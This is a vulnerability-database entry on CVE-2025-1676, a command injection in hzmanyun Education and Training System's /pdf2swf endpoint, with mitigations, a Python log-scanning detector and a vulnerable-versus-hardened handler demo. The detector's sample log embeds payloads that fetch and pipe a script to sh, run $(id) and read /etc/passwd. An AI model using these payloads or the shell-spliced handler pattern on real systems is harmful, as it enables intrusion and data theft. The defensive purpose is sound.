CVE-2025-1676
Published: 25 February 2025
Summary
CVE-2025-1676 is a medium-severity Command Injection (CWE-77) vulnerability in Hzmanyun Education And Training System. Its CVSS base score is 5.3 (Medium).
Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190); ranked in the top 26.2% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog.
The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-2 (Flaw Remediation).
Deeper analysis
The source description labels the issue critical, although its CVSS base score is 5.3 (Medium). It exists in hzmanyun Education and Training System 3.1.1, in the pdf2swf function behind the /pdf2swf endpoint: the file argument reaches an operating-system command without adequate validation, so an attacker who controls it can append or substitute shell commands. The issue is tracked under CWE-77 (Command Injection) and CWE-78 (OS Command Injection); the 5.3 score reflects a network attack vector, low attack complexity and low privileges required.
The flaw can be exploited remotely by an authenticated attacker with low privileges. Successful exploitation executes arbitrary operating-system commands with the privileges of the process that runs pdf2swf, affecting confidentiality, integrity and availability of the target system. Public exploit code has already been disclosed and may be in use.
The referenced sources contain no vendor advisory or patch details, so no fixed version can be confirmed from them. The EPSS score shows only a minor peak and remains low overall.
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2025-5446
Vulnerability details
A vulnerability classified as critical was found in hzmanyun Education and Training System 3.1.1. Affected by this vulnerability is the function pdf2swf of the file /pdf2swf. The manipulation of the argument file leads to OS command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
Related Threats
MITRE ATT&CK Enterprise Techniques
Why these techniques?
The /pdf2swf endpoint is part of a web application reachable over the network, so exploiting it is Exploit Public-Facing Application (T1190); the injected payload is then run by the operating-system shell, which is Command and Scripting Interpreter (T1059).
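Added example for the detection side of T1190 against this endpoint (not code from the page's sources or from hzmanyun): a Python scanner that reads web-server access logs in combined format and flags requests to /pdf2swf whose file parameter, once URL-decoded, carries shell metacharacters or path traversal. The log lines are constructed for this example, and it assumes the parameter travels in the query string; a POST body never reaches an access log and would need the application log or a WAF instead.

```python
"""Added example: flag likely CVE-2025-1676 exploitation attempts in access logs.
Not from hzmanyun or the referenced sources; log lines below are constructed."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed combined-format lines. Lines 2, 3 and 5 carry injection or
# traversal payloads; line 4 mentions /pdf2swf only in another parameter.
SAMPLE_LOG = """\
203.0.113.7 - - [25/Feb/2025:10:01:02 +0000] "GET /pdf2swf?file=lesson1.pdf HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.23 - - [25/Feb/2025:10:01:09 +0000] "GET /pdf2swf?file=a.pdf%3Bcurl%20http%3A%2F%2F198.51.100.23%2Fx%7Csh HTTP/1.1" 200 512 "-" "python-requests/2.31"
198.51.100.23 - - [25/Feb/2025:10:01:11 +0000] "GET /pdf2swf?file=%24%28id%29.pdf HTTP/1.1" 200 512 "-" "python-requests/2.31"
203.0.113.9 - - [25/Feb/2025:10:02:30 +0000] "GET /login?next=%2Fpdf2swf HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.9 - - [25/Feb/2025:10:02:45 +0000] "GET /pdf2swf?file=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 404 0 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, request line and status from a combined-format entry.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Shell metacharacters, newlines and traversal have no place in a PDF file name.
SHELL_META = re.compile(r"[;&|`$<>\n]|\.\./|\\")


def file_arg(target: str):
    """Return the decoded `file` parameter of a /pdf2swf request, else None."""
    parts = urlsplit(target)
    if parts.path != "/pdf2swf":
        return None
    values = parse_qs(parts.query, keep_blank_values=True).get("file")
    if not values:
        return None
    # parse_qs decoded once; decode again so double-encoded payloads still match.
    return unquote(values[0])


def is_suspicious(value: str) -> bool:
    """Metacharacters, traversal, or a name that is not a .pdf at all."""
    return bool(SHELL_META.search(value)) or not value.lower().endswith(".pdf")


def scan(log_text: str):
    """Return (ip, timestamp, decoded file value, status) for each flagged line."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        value = file_arg(m["target"])
        if value is not None and is_suspicious(value):
            hits.append((m["ip"], m["ts"], value, m["status"]))
    return hits


if __name__ == "__main__":
    for ip, ts, value, status in scan(SAMPLE_LOG):
        print(f"{ts} {ip} status={status} file={value!r}")
```

A 404 or 500 on a flagged request does not mean the attempt failed: the converter may have run the injected command before the handler returned an error, so treat every hit as an investigation lead rather than relying on the status code.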
Mitigating Controls (NIST 800-53 r5)
- SI-2 (Flaw Remediation): removes the root cause by identifying, prioritising and applying a vendor fix to the affected hzmanyun Education and Training System; since the referenced sources give no patch details, confirm a fixed version with the vendor before relying on this control.
- SI-10 (Information Input Validation): prevents the injection by validating the file argument to /pdf2swf against an allowlist (an expected file-name pattern with no path separators or shell metacharacters) rather than trying to strip dangerous characters, and by passing the value to the converter as a separate argument instead of interpolating it into a shell command line.
- AC-6 (Least Privilege): limits the impact of any command that does get injected by running the process that invokes pdf2swf as a dedicated low-privilege account, so that exploitation does not translate into control of the host.
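As an added example, not code from hzmanyun or from any of the referenced sources, the following Python models the pattern the deeper analysis describes and the SI-10 control above calls for: a hypothetical /pdf2swf handler that splices the file parameter into a shell command, beside a hardened version that allowlists the name, confines it to the upload directory and invokes the converter with an argv list and no shell. The upload directory /var/www/uploads, the handler functions and the use of echo in place of the pdf2swf binary are assumptions made so the script runs without swftools installed.

```python
"""Added example (not hzmanyun code): vulnerable vs hardened /pdf2swf handler.
Assumes uploads live under /var/www/uploads; `echo` stands in for pdf2swf."""
import re
import subprocess
from pathlib import Path

TOOL = "echo"  # stand-in for "pdf2swf" so the example runs anywhere
UPLOAD_DIR = Path("/var/www/uploads")  # assumed upload location
# Allowlist: first character alphanumeric or underscore (so the name can never be
# parsed as a converter option), a conservative character set, and a .pdf suffix.
SAFE_NAME = re.compile(r"[A-Za-z0-9_][A-Za-z0-9_.-]{0,127}\.pdf")


def vulnerable_command(file: str) -> str:
    """The CWE-78 pattern: the request parameter is spliced into a command line
    that a shell will parse, so ';', '|', '$(...)' and friends are honoured."""
    return f"{TOOL} {file} -o {file}.swf"


def run_vulnerable(file: str) -> str:
    """Execute through /bin/sh exactly as the vulnerable handler would."""
    result = subprocess.run(vulnerable_command(file), shell=True,
                            capture_output=True, text=True)
    return result.stdout


def safe_argv(file: str, upload_dir: Path = UPLOAD_DIR) -> list[str]:
    """SI-10 style validation plus argv construction with no shell involved.

    Rejects anything outside the allowlist, then confirms the resolved path
    still sits directly inside the upload directory (no traversal, no symlink
    escape)."""
    if not SAFE_NAME.fullmatch(file):
        raise ValueError(f"rejected file name: {file!r}")
    src = (upload_dir / file).resolve()
    if src.parent != upload_dir.resolve():
        raise ValueError(f"path escapes upload directory: {file!r}")
    dst = src.with_suffix(".swf")
    return [TOOL, str(src), "-o", str(dst)]


def run_hardened(file: str) -> str:
    """argv list with shell=False: the validated name reaches the converter as
    one literal argument and no shell ever interprets it."""
    result = subprocess.run(safe_argv(file), shell=False,
                            capture_output=True, text=True)
    return result.stdout


if __name__ == "__main__":
    payload = "x.pdf; echo INJECTED"
    print("vulnerable handler output:\n" + run_vulnerable(payload))
    try:
        safe_argv(payload)
    except ValueError as err:
        print("hardened handler:", err)
    print("hardened handler output:\n" + run_hardened("report.pdf"))
```

Quoting the value with shlex.quote while still going through a shell is a weaker fix than dropping the shell entirely, and even with shell=False a name beginning with "-" could be read by the converter as an option, which is why the allowlist pins the first character.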